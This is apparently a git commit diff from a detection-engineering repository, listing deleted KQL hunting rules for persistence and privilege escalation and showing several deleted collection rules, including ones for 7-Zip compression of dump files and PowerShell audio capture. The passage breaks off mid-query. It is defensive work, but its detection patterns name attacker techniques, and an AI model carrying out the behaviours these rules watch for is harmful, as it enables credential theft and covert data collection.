Persistence/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql delete mode 100644 Persistence/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql delete mode 100644 Persistence/Potential_DLL_Sideloading_Via_JsSchHlp.kql delete mode 100644 Persistence/Potential_DLL_Sideloading_Via_comctl32.dll.kql delete mode 100644 Persistence/Potential_Libvlc.DLL_Sideloading.kql delete mode 100644 Persistence/Potential_PSFactoryBuffer_COM_Hijacking.kql delete mode 100644 Persistence/Potential_Persistence_Attempt_Via_ErrorHandler.Cmd.kql delete mode 100644 Persistence/Potential_Persistence_Attempt_Via_Existing_Service_Tampering.kql delete mode 100644 Persistence/Potential_Persistence_Attempt_Via_Run_Keys_Using_Reg.EXE.kql delete mode 100644 Persistence/Potential_Persistence_Using_DebugPath.kql delete mode 100644 Persistence/Potential_Persistence_Via_AppCompat_RegisterAppRestart_Layer.kql delete mode 100644 Persistence/Potential_Persistence_Via_App_Paths_Default_Property.kql delete mode 100644 Persistence/Potential_Persistence_Via_AutodialDLL.kql delete mode 100644 Persistence/Potential_Persistence_Via_CHM_Helper_DLL.kql delete mode 100644 Persistence/Potential_Persistence_Via_COM_Hijacking_From_Suspicious_Locations.kql delete mode 100644 Persistence/Potential_Persistence_Via_COM_Search_Order_Hijacking.kql delete mode 100644 Persistence/Potential_Persistence_Via_DLLPathOverride.kql delete mode 100644 Persistence/Potential_Persistence_Via_Disk_Cleanup_Handler_-_Registry.kql delete mode 100644 Persistence/Potential_Persistence_Via_Event_Viewer_Events.asp.kql delete mode 100644 Persistence/Potential_Persistence_Via_Excel_Add-in_-_Registry.kql delete mode 100644 Persistence/Potential_Persistence_Via_GlobalFlags.kql delete mode 100644 Persistence/Potential_Persistence_Via_LSA_Extensions.kql delete mode 100644 Persistence/Potential_Persistence_Via_Logon_Scripts_-_CommandLine.kql delete mode 100644 Persistence/Potential_Persistence_Via_Logon_Scripts_-_Registry.kql delete mode 100644 Persistence/Potential_Persistence_Via_Microsoft_Compatibility_Appraiser.kql delete mode 100644 Persistence/Potential_Persistence_Via_Microsoft_Office_Add-In.kql delete mode 100644 Persistence/Potential_Persistence_Via_Microsoft_Office_Startup_Folder.kql delete mode 100644 Persistence/Potential_Persistence_Via_Mpnotify.kql delete mode 100644 Persistence/Potential_Persistence_Via_MyComputer_Registry_Keys.kql delete mode 100644 Persistence/Potential_Persistence_Via_Netsh_Helper_DLL.kql delete mode 100644 Persistence/Potential_Persistence_Via_Netsh_Helper_DLL_-_Registry.kql delete mode 100644 Persistence/Potential_Persistence_Via_New_AMSI_Providers_-_Registry.kql delete mode 100644 Persistence/Potential_Persistence_Via_Notepad++_Plugins.kql delete mode 100644 Persistence/Potential_Persistence_Via_Outlook_Form.kql delete mode 100644 Persistence/Potential_Persistence_Via_Outlook_Home_Page.kql delete mode 100644 Persistence/Potential_Persistence_Via_Outlook_LoadMacroProviderOnBoot_Setting.kql delete mode 100644 Persistence/Potential_Persistence_Via_Outlook_Today_Pages.kql delete mode 100644 Persistence/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql delete mode 100644 Persistence/Potential_Persistence_Via_Scrobj.dll_COM_Hijacking.kql delete mode 100644 Persistence/Potential_Persistence_Via_Shim_Database_In_Uncommon_Location.kql delete mode 100644 Persistence/Potential_Persistence_Via_Shim_Database_Modification.kql delete mode 100644 Persistence/Potential_Persistence_Via_TypedPaths.kql delete mode 100644 Persistence/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql delete mode 100644 Persistence/Potential_Persistence_Via_Visual_Studio_Tools_for_Office.kql delete mode 100644 Persistence/Potential_PrintNightmare_Exploitation_Attempt.kql delete mode 100644 Persistence/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql delete mode 100644 Persistence/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql delete mode 100644 Persistence/Potential_Ransomware_or_Unauthorized_MBR_Tampering_Via_Bcdedit.EXE.kql delete mode 100644 Persistence/Potential_Registry_Persistence_Attempt_Via_DbgManagedDebugger.kql delete mode 100644 Persistence/Potential_Registry_Persistence_Attempt_Via_Windows_Telemetry.kql delete mode 100644 Persistence/Potential_RipZip_Attack_on_Startup_Folder.kql delete mode 100644 Persistence/Potential_SentinelOne_Shell_Context_Menu_Scan_Command_Tampering.kql delete mode 100644 Persistence/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql delete mode 100644 Persistence/Potential_Startup_Shortcut_Persistence_Via_PowerShell.EXE.kql delete mode 100644 Persistence/Potential_Suspicious_Activity_Using_SeCEdit.kql delete mode 100644 Persistence/Potential_Suspicious_PowerShell_Module_File_Created.kql delete mode 100644 Persistence/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql delete mode 100644 Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql delete mode 100644 Persistence/Potential_Webshell_Creation_On_Static_Website.kql delete mode 100644 Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql delete mode 100644 Persistence/PowerShell_Module_File_Created.kql delete mode 100644 Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql delete mode 100644 Persistence/PowerShell_Profile_Modification.kql delete mode 100644 Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql delete mode 100644 Persistence/Powerup_Write_Hijack_DLL.kql delete mode 100644 Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql delete mode 100644 Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql delete mode 100644 Persistence/RDP_Sensitive_Settings_Changed.kql delete mode 100644 Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql delete mode 100644 Persistence/Register_New_IFiltre_For_Persistence.kql delete mode 100644 Persistence/Registry_Modification_to_Hidden_File_Extension.kql delete mode 100644 Persistence/Registry_Persistence_via_Explorer_Run_Key.kql delete mode 100644 Persistence/Rundll32_Registered_COM_Objects.kql delete mode 100644 Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql delete mode 100644 Persistence/Scheduled_TaskCache_Change_by_Uncommon_Program.kql delete mode 100644 Persistence/Scheduled_Task_Creation_Via_Schtasks.EXE.kql delete mode 100644 Persistence/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql delete mode 100644 Persistence/Scheduled_Task_Executing_Payload_from_Registry.kql delete mode 100644 Persistence/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql delete mode 100644 Persistence/Security_Support_Provider_(SSP)_Added_to_LSA_Configuration.kql delete mode 100644 Persistence/ServiceDll_Hijack.kql delete mode 100644 Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql delete mode 100644 Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql delete mode 100644 Persistence/Session_Manager_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Shell_Process_Spawned_by_Java.EXE.kql delete mode 100644 Persistence/Startup_Folder_File_Write.kql delete mode 100644 Persistence/Sticky_Key_Like_Backdoor_Execution.kql delete mode 100644 Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql delete mode 100644 Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql delete mode 100644 Persistence/Suspicious_Child_Process_Of_SQL_Server.kql delete mode 100644 Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql delete mode 100644 Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql delete mode 100644 Persistence/Suspicious_Debugger_Registration_Cmdline.kql delete mode 100644 Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql delete mode 100644 Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql delete mode 100644 Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql delete mode 100644 Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql delete mode 100644 Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql delete mode 100644 Persistence/Suspicious_File_Drop_by_Exchange.kql delete mode 100644 Persistence/Suspicious_Get-Variable.exe_Creation.kql delete mode 100644 Persistence/Suspicious_GrpConv_Execution.kql delete mode 100644 Persistence/Suspicious_IIS_Module_Registration.kql delete mode 100644 Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql delete mode 100644 Persistence/Suspicious_New_Service_Creation.kql delete mode 100644 Persistence/Suspicious_Outlook_Macro_Created.kql delete mode 100644 Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql delete mode 100644 Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql delete mode 100644 Persistence/Suspicious_Process_By_Web_Server_Process.kql delete mode 100644 Persistence/Suspicious_Process_Execution_From_Fake_Recycle.Bin_Folder.kql delete mode 100644 Persistence/Suspicious_Processes_Spawned_by_Java.EXE.kql delete mode 100644 Persistence/Suspicious_Processes_Spawned_by_WinRM.kql delete mode 100644 Persistence/Suspicious_Run_Key_from_Download.kql delete mode 100644 Persistence/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql delete mode 100644 Persistence/Suspicious_Scheduled_Task_Creation_via_Masqueraded_XML_File.kql delete mode 100644 Persistence/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql delete mode 100644 Persistence/Suspicious_Schtasks_Execution_AppData_Folder.kql delete mode 100644 Persistence/Suspicious_Screensaver_Binary_File_Creation.kql delete mode 100644 Persistence/Suspicious_Service_DACL_Modification_Via_Set-Service_Cmdlet.kql delete mode 100644 Persistence/Suspicious_Service_Path_Modification.kql delete mode 100644 Persistence/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql delete mode 100644 Persistence/Suspicious_Shim_Database_Patching_Activity.kql delete mode 100644 Persistence/Suspicious_Startup_Folder_Persistence.kql delete mode 100644 Persistence/Suspicious_WindowsTerminal_Child_Processes.kql delete mode 100644 Persistence/Suspicious_desktop.ini_Action.kql delete mode 100644 Persistence/Sysinternals_PsService_Execution.kql delete mode 100644 Persistence/Sysinternals_PsSuspend_Execution.kql delete mode 100644 Persistence/System_Scripts_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Tasks_Folder_Evasion.kql delete mode 100644 Persistence/Third_Party_Software_DLL_Sideloading.kql delete mode 100644 Persistence/UAC_Bypass_With_Fake_DLL.kql delete mode 100644 Persistence/UEFI_Persistence_Via_Wpbbin_-_FileCreation.kql delete mode 100644 Persistence/UEFI_Persistence_Via_Wpbbin_-_ProcessCreation.kql delete mode 100644 Persistence/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql delete mode 100644 Persistence/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql delete mode 100644 Persistence/Uncommon_Userinit_Child_Process.kql delete mode 100644 Persistence/Unsigned_AppX_Installation_Attempt_Using_Add-AppxPackage.kql delete mode 100644 Persistence/User_Added_To_Highly_Privileged_Group.kql delete mode 100644 Persistence/User_Added_to_Local_Administrators_Group.kql delete mode 100644 Persistence/User_Added_to_Remote_Desktop_Users_Group.kql delete mode 100644 Persistence/VBScript_Payload_Stored_in_Registry.kql delete mode 100644 Persistence/VMToolsd_Suspicious_Child_Process.kql delete mode 100644 Persistence/VsCode_Powershell_Profile_Modification.kql delete mode 100644 Persistence/WINEKEY_Registry_Modification.kql delete mode 100644 Persistence/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql delete mode 100644 Persistence/WMI_Backdoor_Exchange_Transport_Agent.kql delete mode 100644 Persistence/WMI_Persistence_-_Command_Line_Event_Consumer.kql delete mode 100644 Persistence/WMI_Persistence_-_Script_Event_Consumer.kql delete mode 100644 Persistence/WMI_Persistence_-_Script_Event_Consumer_File_Write.kql delete mode 100644 Persistence/Webshell_Detection_With_Command_Line_Keywords.kql delete mode 100644 Persistence/Webshell_Hacking_Activity_Patterns.kql delete mode 100644 Persistence/Webshell_Tool_Reconnaissance_Activity.kql delete mode 100644 Persistence/WinSock2_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Windows_Spooler_Service_Suspicious_Binary_Load.kql delete mode 100644 Persistence/Windows_Terminal_Profile_Settings_Modification_By_Uncommon_Process.kql delete mode 100644 Persistence/Winget_Admin_Settings_Modification.kql delete mode 100644 Persistence/Winlogon_AllowMultipleTSSessions_Enable.kql delete mode 100644 Persistence/Winlogon_Notify_Key_Logon_Persistence.kql delete mode 100644 Persistence/Wow6432Node_Classes_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Wow6432Node_CurrentVersion_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Wow6432Node_Windows_NT_CurrentVersion_Autorun_Keys_Modification.kql delete mode 100644 Persistence/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql delete mode 100644 Privilege Escalation/Abuse_of_Service_Permissions_to_Hide_Services_Via_Set-Service.kql delete mode 100644 Privilege Escalation/Abused_Debug_Privilege_by_Arbitrary_Parent_Processes.kql delete mode 100644 Privilege Escalation/Always_Install_Elevated_MSI_Spawned_Cmd_And_Powershell.kql delete mode 100644 Privilege Escalation/Always_Install_Elevated_Windows_Installer.kql delete mode 100644 Privilege Escalation/Aruba_Network_Service_Potential_DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Bypass_UAC_Using_DelegateExecute.kql delete mode 100644 Privilege Escalation/Bypass_UAC_Using_SilentCleanup_Task.kql delete mode 100644 Privilege Escalation/Bypass_UAC_via_CMSTP.kql delete mode 100644 Privilege Escalation/Bypass_UAC_via_Fodhelper.exe.kql delete mode 100644 Privilege Escalation/Bypass_UAC_via_WSReset.exe.kql delete mode 100644 Privilege Escalation/CMSTP_UAC_Bypass_via_COM_Object_Access.kql delete mode 100644 Privilege Escalation/COM_Hijack_via_Sdclt.kql delete mode 100644 Privilege Escalation/Creation_Of_Non-Existent_System_DLL.kql delete mode 100644 Privilege Escalation/DLL_Search_Order_Hijackig_Via_Additional_Space_in_Path.kql delete mode 100644 Privilege Escalation/DLL_Sideloading_Of_ShellChromeAPI.DLL.kql delete mode 100644 Privilege Escalation/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql delete mode 100644 Privilege Escalation/Enabling_COR_Profiler_Environment_Variables.kql delete mode 100644 Privilege Escalation/HackTool_-_CrackMapExec_Execution.kql delete mode 100644 Privilege Escalation/HackTool_-_Empire_PowerShell_UAC_Bypass.kql delete mode 100644 Privilege Escalation/HackTool_-_SharpImpersonation_Execution.kql delete mode 100644 Privilege Escalation/HackTool_-_SharpUp_PrivEsc_Tool_Execution.kql delete mode 100644 Privilege Escalation/HackTool_-_WinPwn_Execution.kql delete mode 100644 Privilege Escalation/HackTool_-_winPEAS_Execution.kql delete mode 100644 Privilege Escalation/Interactive_AT_Job.kql delete mode 100644 Privilege Escalation/LiveKD_Driver_Creation.kql delete mode 100644 Privilege Escalation/LiveKD_Driver_Creation_By_Uncommon_Process.kql delete mode 100644 Privilege Escalation/LiveKD_Kernel_Memory_Dump_File_Created.kql delete mode 100644 Privilege Escalation/Malicious_DLL_File_Dropped_in_the_Teams_or_OneDrive_Folder.kql delete mode 100644 Privilege Escalation/Mavinject_Inject_DLL_Into_Running_Process.kql delete mode 100644 Privilege Escalation/Microsoft_Office_DLL_Sideload.kql delete mode 100644 Privilege Escalation/Modify_Group_Policy_Settings.kql delete mode 100644 Privilege Escalation/Modify_User_Shell_Folders_Startup_Value.kql delete mode 100644 Privilege Escalation/New_Kernel_Driver_Via_SC.EXE.kql delete mode 100644 Privilege Escalation/New_Service_Creation_Using_PowerShell.kql delete mode 100644 Privilege Escalation/New_Service_Creation_Using_Sc.EXE.kql delete mode 100644 Privilege Escalation/New_TimeProviders_Registered_With_Uncommon_DLL_Name.kql delete mode 100644 Privilege Escalation/PSEXEC_Remote_Execution_File_Artefact.kql delete mode 100644 Privilege Escalation/PUA_-_AdvancedRun_Execution.kql delete mode 100644 Privilege Escalation/PUA_-_AdvancedRun_Suspicious_Execution.kql delete mode 100644 Privilege Escalation/PUA_-_Wsudo_Suspicious_Execution.kql delete mode 100644 Privilege Escalation/Password_Provided_In_Command_Line_Of_Net.EXE.kql delete mode 100644 Privilege Escalation/Path_To_Screensaver_Binary_Modified.kql delete mode 100644 Privilege Escalation/Persistence_Via_Sticky_Key_Backdoor.kql delete mode 100644 Privilege Escalation/Possible_Privilege_Escalation_via_Weak_Service_Permissions.kql delete mode 100644 Privilege Escalation/Potential_7za.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_AVKkid.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Antivirus_Software_DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Azure_Browser_SSO_Abuse.kql delete mode 100644 Privilege Escalation/Potential_CCleanerDU.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_CCleanerReactivator.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Chrome_Frame_Helper_DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_CobaltStrike_Service_Installations_-_Registry.kql delete mode 100644 Privilege Escalation/Potential_DLL_Sideloading_Of_DBGCORE.DLL.kql delete mode 100644 Privilege Escalation/Potential_DLL_Sideloading_Of_DBGHELP.DLL.kql delete mode 100644 Privilege Escalation/Potential_DLL_Sideloading_Of_Libcurl.DLL_Via_GUP.EXE.kql delete mode 100644 Privilege Escalation/Potential_DLL_Sideloading_Via_ClassicExplorer32.dll.kql delete mode 100644 Privilege Escalation/Potential_DLL_Sideloading_Via_JsSchHlp.kql delete mode 100644 Privilege Escalation/Potential_DLL_Sideloading_Via_comctl32.dll.kql delete mode 100644 Privilege Escalation/Potential_EACore.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Edputil.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Goopdate.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Iviewers.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Libvlc.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Mfdetours.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Persistence_Via_GlobalFlags.kql delete mode 100644 Privilege Escalation/Potential_Persistence_Via_Netsh_Helper_DLL.kql delete mode 100644 Privilege Escalation/Potential_PrintNightmare_Exploitation_Attempt.kql delete mode 100644 Privilege Escalation/Potential_Privilege_Escalation_Attempt_Via_.Exe.Local_Technique.kql delete mode 100644 Privilege Escalation/Potential_Privilege_Escalation_Using_Symlink_Between_Osk_and_Cmd.kql delete mode 100644 Privilege Escalation/Potential_Privilege_Escalation_via_Service_Permissions_Weakness.kql delete mode 100644 Privilege Escalation/Potential_Rcdll.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Default_Location.kql delete mode 100644 Privilege Escalation/Potential_RjvPlatform.DLL_Sideloading_From_Non-Default_Location.kql delete mode 100644 Privilege Escalation/Potential_RoboForm.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_ShellDispatch.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Shim_Database_Persistence_via_Sdbinst.EXE.kql delete mode 100644 Privilege Escalation/Potential_SmadHook.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_SolidPDFCreator.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Suspicious_Activity_Using_SeCEdit.kql delete mode 100644 Privilege Escalation/Potential_System_DLL_Sideloading_From_Non_System_Locations.kql delete mode 100644 Privilege Escalation/Potential_UAC_Bypass_Via_Sdclt.EXE.kql delete mode 100644 Privilege Escalation/Potential_Vivaldi_elf.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_WWlib.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Waveedit.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potential_appverifUI.DLL_Sideloading.kql delete mode 100644 Privilege Escalation/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql delete mode 100644 Privilege Escalation/Potentially_Suspicious_Event_Viewer_Child_Process.kql delete mode 100644 Privilege Escalation/PowerShell_Profile_Modification.kql delete mode 100644 Privilege Escalation/Powerup_Write_Hijack_DLL.kql delete mode 100644 Privilege Escalation/Process_Creation_Using_Sysnative_Folder.kql delete mode 100644 Privilege Escalation/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql delete mode 100644 Privilege Escalation/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql delete mode 100644 Privilege Escalation/Regedit_as_Trusted_Installer.kql delete mode 100644 Privilege Escalation/Renamed_Mavinject.EXE_Execution.kql delete mode 100644 Privilege Escalation/Rundll32_Registered_COM_Objects.kql delete mode 100644 Privilege Escalation/Scheduled_Task_Creation_Via_Schtasks.EXE.kql delete mode 100644 Privilege Escalation/Sdclt_Child_Processes.kql delete mode 100644 Privilege Escalation/Security_Privileges_Enumeration_Via_Whoami.EXE.kql delete mode 100644 Privilege Escalation/ServiceDll_Hijack.kql delete mode 100644 Privilege Escalation/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql delete mode 100644 Privilege Escalation/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql delete mode 100644 Privilege Escalation/Shell_Open_Registry_Keys_Manipulation.kql delete mode 100644 Privilege Escalation/Shell_Process_Spawned_by_Java.EXE.kql delete mode 100644 Privilege Escalation/Sticky_Key_Like_Backdoor_Execution.kql delete mode 100644 Privilege Escalation/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql delete mode 100644 Privilege Escalation/Suspect_Svchost_Activity.kql delete mode 100644 Privilege Escalation/Suspicious_Child_Process_Created_as_System.kql delete mode 100644 Privilege Escalation/Suspicious_Child_Process_Of_SQL_Server.kql delete mode 100644 Privilege Escalation/Suspicious_Child_Process_Of_Veeam_Dabatase.kql delete mode 100644 Privilege Escalation/Suspicious_Child_Process_Of_Wermgr.EXE.kql delete mode 100644 Privilege Escalation/Suspicious_Debugger_Registration_Cmdline.kql delete mode 100644 Privilege Escalation/Suspicious_NTLM_Authentication_on_the_Printer_Spooler_Service.kql delete mode 100644 Privilege Escalation/Suspicious_New_Service_Creation.kql delete mode 100644 Privilege Escalation/Suspicious_Printer_Driver_Empty_Manufacturer.kql delete mode 100644 Privilege Escalation/Suspicious_Processes_Spawned_by_Java.EXE.kql delete mode 100644 Privilege Escalation/Suspicious_Processes_Spawned_by_WinRM.kql delete mode 100644 Privilege Escalation/Suspicious_RunAs-Like_Flag_Combination.kql delete mode 100644 Privilege Escalation/Suspicious_SYSTEM_User_Process_Creation.kql delete mode 100644 Privilege Escalation/Suspicious_ScreenSave_Change_by_Reg.exe.kql delete mode 100644 Privilege Escalation/Suspicious_Service_Path_Modification.kql delete mode 100644 Privilege Escalation/Suspicious_Shells_Spawn_by_Java_Utility_Keytool.kql delete mode 100644 Privilege Escalation/Suspicious_Spool_Service_Child_Process.kql delete mode 100644 Privilege Escalation/Third_Party_Software_DLL_Sideloading.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Tools_Using_ComputerDefaults.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_ChangePK_and_SLUI.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Disk_Cleanup.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_DismHost.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_EventVwr.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Event_Viewer_RecentViews.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_IDiagnostic_Profile_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_IEInstal_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_IEInstal_-_Process.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Iscsicpl_-_ImageLoad.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_MSConfig_Token_Modification_-_Process.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_NTFS_Reparse_Point_-_Process.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_PkgMgr_and_DISM.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_File.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Process.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Using_Windows_Media_Player_-_Registry.kql delete mode 100644 Privilege Escalation/UAC_Bypass_Via_Wsreset.kql delete mode 100644 Privilege Escalation/UAC_Bypass_WSReset.kql delete mode 100644 Privilege Escalation/UAC_Bypass_With_Fake_DLL.kql delete mode 100644 Privilege Escalation/UAC_Bypass_via_Event_Viewer.kql delete mode 100644 Privilege Escalation/UAC_Bypass_via_ICMLuaUtil.kql delete mode 100644 Privilege Escalation/UAC_Bypass_via_Sdclt.kql delete mode 100644 Privilege Escalation/UAC_Bypass_via_Windows_Firewall_Snap-In_Hijack.kql delete mode 100644 Privilege Escalation/UAC_Disabled.kql delete mode 100644 Privilege Escalation/UAC_Notification_Disabled.kql delete mode 100644 Privilege Escalation/UAC_Secure_Desktop_Prompt_Disabled.kql delete mode 100644 Privilege Escalation/Uncommon_Extension_Shim_Database_Installation_Via_Sdbinst.EXE.kql delete mode 100644 Privilege Escalation/Uncommon_One_Time_Only_Scheduled_Task_At_00_00.kql delete mode 100644 Privilege Escalation/VsCode_Powershell_Profile_Modification.kql delete mode 100644 Privilege Escalation/WMI_ActiveScriptEventConsumers_Activity_Via_Scrcons.EXE_DLL_Load.kql delete mode 100644 Privilege Escalation/WMI_Persistence_-_Script_Event_Consumer.kql delete mode 100644 Privilege Escalation/Whoami.EXE_Execution_From_Privileged_Process.kql delete mode 100644 Privilege Escalation/Windows_Kernel_Debugger_Execution.kql delete mode 100644 Privilege Escalation/Windows_Spooler_Service_Suspicious_Binary_Load.kql create mode 100644 helper.py create mode 100644 requirements.txt diff --git a/Collection/7Zip_Compressing_Dump_Files.kql b/Collection/7Zip_Compressing_Dump_Files.kql deleted file mode 100644 index daeee759..00000000 --- a/Collection/7Zip_Compressing_Dump_Files.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/27 -// Level: medium -// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. -// Tags: attack.collection, attack.t1560.001 -DeviceProcessEvents -| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) \ No newline at end of file diff --git a/Collection/Audio_Capture_via_PowerShell.kql b/Collection/Audio_Capture_via_PowerShell.kql deleted file mode 100644 index b1de4d13..00000000 --- a/Collection/Audio_Capture_via_PowerShell.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/24 -// Level: medium -// Description: Detects audio capture via PowerShell Cmdlet. -// Tags: attack.collection, attack.t1123 -DeviceProcessEvents -| where ProcessCommandLine contains "WindowsAudioDevice-Powershell-Cmdlet" or ProcessCommandLine contains "Toggle-AudioDevice" or ProcessCommandLine contains "Get-AudioDevice " or ProcessCommandLine contains "Set-AudioDevice " or ProcessCommandLine contains "Write-AudioDevice " \ No newline at end of file diff --git a/Collection/Audio_Capture_via_SoundRecorder.kql b/Collection/Audio_Capture_via_SoundRecorder.kql deleted file mode 100644 index 5dcbdbbf..00000000 --- a/Collection/Audio_Capture_via_SoundRecorder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019/10/24 -// Level: medium -// Description: Detect attacker collecting audio via SoundRecorder application. -// Tags: attack.collection, attack.t1123 -DeviceProcessEvents -| where ProcessCommandLine contains "/FILE" and FolderPath endswith "\\SoundRecorder.exe" \ No newline at end of file diff --git a/Collection/Automated_Collection_Command_Prompt.kql b/Collection/Automated_Collection_Command_Prompt.kql deleted file mode 100644 index 9f680167..00000000 --- a/Collection/Automated_Collection_Command_Prompt.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/28 -// Level: medium -// Description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. -// Tags: attack.collection, attack.t1119, attack.credential_access, attack.t1552.001 -DeviceProcessEvents -| where (ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".docx" or ProcessCommandLine contains ".xls" 